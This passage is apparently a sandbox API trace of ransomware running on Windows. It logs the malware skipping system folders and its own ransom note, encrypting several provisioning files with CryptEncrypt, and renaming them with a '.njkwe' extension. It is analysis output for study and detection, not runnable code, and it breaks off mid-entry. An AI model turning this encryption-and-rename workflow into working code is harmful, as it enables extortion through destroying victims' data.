GetProcessHeap () returned 0xbe0000 [0079.173] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.173] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x27e, lpOverlapped=0x0) returned 1 [0079.174] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.174] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x27e, lpOverlapped=0x0) returned 1 [0079.174] GetProcessHeap () returned 0xbe0000 [0079.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.175] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.175] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.175] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.175] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.175] CloseHandle (hObject=0x43c) returned 1 [0079.175] GetProcessHeap () returned 0xbe0000 [0079.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.175] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0079.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\416__connections_cellular_zain (sudan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\416__Connections_Cellular_Zain (Sudan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\416__connections_cellular_zain (sudan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.176] GetProcessHeap () returned 0xbe0000 [0079.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.176] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f3f19a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f3f19a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f3f19a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="417__C~1.PRO")) returned 1 [0079.176] lstrcmpiW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.176] lstrcmpiW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.176] lstrcmpiW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.176] lstrcmpiW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.176] lstrcmpiW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.176] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml") returned 160 [0079.177] StrStrIW (lpFirst="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.177] lstrcmpW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.177] lstrcmpW (lpString1="417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.177] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\417__connections_cellular_halebop (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.177] GetTickCount () returned 0x11541d8 [0079.177] GetTickCount () returned 0x11541d8 [0079.177] GetTickCount () returned 0x11541d8 [0079.177] GetTickCount () returned 0x11541d8 [0079.177] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.177] GetProcessHeap () returned 0xbe0000 [0079.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.177] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0079.179] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.180] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0079.180] GetProcessHeap () returned 0xbe0000 [0079.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.180] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.180] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.180] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.180] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.180] CloseHandle (hObject=0x43c) returned 1 [0079.180] GetProcessHeap () returned 0xbe0000 [0079.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.180] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\417__connections_cellular_halebop (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\417__Connections_Cellular_Halebop (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\417__connections_cellular_halebop (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.184] GetProcessHeap () returned 0xbe0000 [0079.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.184] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f3f19a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f3f19a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f3f19a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="418__C~1.PRO")) returned 1 [0079.185] lstrcmpiW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.185] lstrcmpiW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.185] lstrcmpiW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.185] lstrcmpiW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.185] lstrcmpiW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.185] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml") returned 154 [0079.185] StrStrIW (lpFirst="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.185] lstrcmpW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.185] lstrcmpW (lpString1="418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.185] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.185] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\418__connections_cellular_3 (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.185] GetTickCount () returned 0x11541e7 [0079.185] GetTickCount () returned 0x11541e7 [0079.185] GetTickCount () returned 0x11541e7 [0079.185] GetTickCount () returned 0x11541e7 [0079.185] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.185] GetProcessHeap () returned 0xbe0000 [0079.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.185] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0079.193] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.412] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0079.413] GetProcessHeap () returned 0xbe0000 [0079.413] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.413] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.413] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.413] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.413] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.413] CloseHandle (hObject=0x43c) returned 1 [0079.413] GetProcessHeap () returned 0xbe0000 [0079.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.413] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 174 [0079.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\418__connections_cellular_3 (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\418__Connections_Cellular_3 (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\418__connections_cellular_3 (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.415] GetProcessHeap () returned 0xbe0000 [0079.415] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.415] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f3f19a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f3f19a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f3f19a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2be, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", cAlternateFileName="419__C~1.PRO")) returned 1 [0079.415] lstrcmpiW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.415] lstrcmpiW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.415] lstrcmpiW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.415] lstrcmpiW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.415] lstrcmpiW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.415] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml") returned 154 [0079.415] StrStrIW (lpFirst="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.415] lstrcmpW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.415] lstrcmpW (lpString1="419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.415] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.415] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\419__connections_cellular_3 (sweden)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.416] GetTickCount () returned 0x11542c2 [0079.416] GetTickCount () returned 0x11542c2 [0079.416] GetTickCount () returned 0x11542c2 [0079.416] GetTickCount () returned 0x11542c2 [0079.416] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.417] GetProcessHeap () returned 0xbe0000 [0079.417] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.417] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0079.419] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd42, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.419] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0079.420] GetProcessHeap () returned 0xbe0000 [0079.420] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.420] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.420] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.420] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.420] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.420] CloseHandle (hObject=0x43c) returned 1 [0079.420] GetProcessHeap () returned 0xbe0000 [0079.420] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.420] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 174 [0079.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\419__connections_cellular_3 (sweden)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\419__Connections_Cellular_3 (Sweden)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\419__connections_cellular_3 (sweden)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.421] GetProcessHeap () returned 0xbe0000 [0079.421] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.421] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90221ca6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90221ca6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90221ca6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", cAlternateFileName="41__CO~1.PRO")) returned 1 [0079.421] lstrcmpiW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.421] lstrcmpiW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.421] lstrcmpiW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.421] lstrcmpiW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.421] lstrcmpiW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.421] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml") returned 159 [0079.421] StrStrIW (lpFirst="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.421] lstrcmpW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.421] lstrcmpW (lpString1="41__Connections_Cellular_VELCOM (Belarus)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.421] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\41__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start 